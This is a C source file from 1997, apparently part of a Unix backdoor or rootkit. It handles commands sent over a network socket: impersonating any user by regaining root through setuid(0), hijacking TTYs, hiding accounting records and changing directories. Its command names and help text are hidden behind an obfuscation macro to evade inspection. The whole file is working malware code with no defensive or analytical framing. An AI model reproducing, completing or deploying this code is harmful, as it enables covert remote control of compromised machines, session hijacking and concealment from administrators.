/*
** Copyright 1997 TICK (t_i_c_k@hotmail.com)
*/

#include <sys/types.h>
#include <strings.h>
#include <pwd.h>
#include <unistd.h>
#include "strhide.h"
#include "cmds.h"

/* "import" 'export int transfer_socket' and 'extern char **environ' */
int   transfer_socket;
char  **environ;

#define write2sock(str)		writen(transfer_socket, str, strlen(str))

extern u_int    cmd_id;
extern char     param[81];
extern char     dir[81];

struct
{
  char  cCmd[81];
  u_int uiCmd;
} cmd_list[10] = {
                   { "&/#`B.C`B" , CMD_MASKAS },
                   { "&(S0\\/B<T", CMD_REMOVE },
                   { "#,C5Q"     , CMD_CD     },
                   { "#,R@T"     , CMD_BYE    },
                   { "&)24H.3@[" , CMD_TTYHIJ },
                   { "%,#(R)3D`" , CMD_ACCTH  }, 
                   { "&.30](3PT" , CMD_HELP   },
                   { 0, 0 }
                 };
                                            

int iIsCmd(char *buf)
{
  u_int   uiCtr = 0;
  char    *cPtr;


  while(cmd_list[uiCtr].cCmd[0] != 0)
  {
    if( !strncasecmp(buf, SHD(cmd_list[uiCtr].cCmd), strlen(SHD(cmd_list[uiCtr].cCmd))) )
    {
      cmd_id = cmd_list[uiCtr].uiCmd;
      if( cmd_id == CMD_BYE || cmd_id == CMD_HELP || cmd_id == CMD_ACCTH)
        return(1); /* valid command */
      if( (cPtr = strchr(buf, ' ')) == NULL)
        return(-1);     /* no parameters */
      cPtr++;
      if(*cPtr == ' ' || *cPtr == 0)
        return(-1); /* no parameters */
      strncpy(param, cPtr, sizeof(param)-1);
      return(1);  /* valid command */
    }
    uiCtr++;
  }
  return(0);      /* no command */
}

int iMaskAs(char *cUser)
{
  struct passwd   *stPwEnt;
  static uid_t    tReUid;
  static gid_t    tEGid;
  char            cBuf[4096];
  
  if(cUser == (char *) 0)
    return(0);

  tReUid = getuid();
  tEGid = getegid();

  if( (stPwEnt = getpwnam(cUser)) == NULL)
    return(-1);

  /* reset root priv.s */
  if(geteuid() != 0)
  {
    if(setuid(0) < 0)
      return(-2);
    setreuid(tReUid, 0);
    setegid(tEGid);
  }
  if(stPwEnt->pw_uid != 0)
  {
    setegid(stPwEnt->pw_gid);
    setreuid(0, stPwEnt->pw_uid);
  }

  /* set environment */
  sprintf(cBuf, "HOME=%s", stPwEnt->pw_dir);
  putenv(cBuf);
  
  return(0);
}


int iChgDir(char *cDir)
{
  char	cBuf[4096];

  if(chdir(cDir) < 0)
  {
    sprintf(cBuf, "Sorry can't change to %s.\n", cDir);
    write2sock(cBuf);
    return(-1);
  }
  strncpy(dir, cDir, sizeof(dir)-1);

  return(0);
}


void vHelp(void)
{
  write2sock(SHD(">,R@T<7%Q<7%Q<7%Q<6MQ<3(]/B(T<0(T(B(X/C];"));
  write2sock(SHD("Q(S0\\/B<T<6TD(C0C;VMQ<2(E,\",E(G$\".#PA/31Q'SX\\,#5V(G$=/C82/30P/S0C6P`"));
  write2sock(SHD("Q/#`B.C`B<6TD(C0C;VMQ<3PP(CIQ`2,^,C0B(G$F.\"4Y<10$&!5Q/C=Q;20B-\"-O6P``"));
  write2sock(SHD("D,C5Q;34X(S0R;W%Q<6MQ<3PP.C1Q,'$R.34X(WEX<3(P/3U;"));
  write2sock(SHD("E)24H.3@[<6TE)2AO<6MQ<3DX.S`R.G$P<04%\"'$B-\"(B.#X_6P``"));
#ifdef ACCTH
  write2sock(SHD("Y,#(R)3EQ<7%Q<7%Q<6MQ<0(E,\",E<0LY,\",E=B)Q$#(R)7$9,#\\U/30C<7DX/R4T(S`R)3@G-'A;"));
#else
  write2sock(SHD("[,#(R)3EQ<7%Q<7%Q<6MQ<0(E,\",E<0LY,\",E=B)Q$#(R)7$9,#\\U/30C<7D_/B5Q,\"<P.#TP,STT>%L`"));
#endif
  write2sock(SHD("B.30](3PT<7%Q<7%Q<6MQ<0@^)'$V)#0B(C0U<3@E?W]_6P``"));
  write2sock("\n\t\t\t\033[1;33m");
  write2sock(SHD("8`CPT,#8^/7$F,\")Q)B,X)24T/W$S*'%;"));
  write2sock("\033[1;5;32m\t\t\t\t");
  write2sock(SHD("%!1@2&EL`"));
  write2sock("\033[0m\n\n");
}












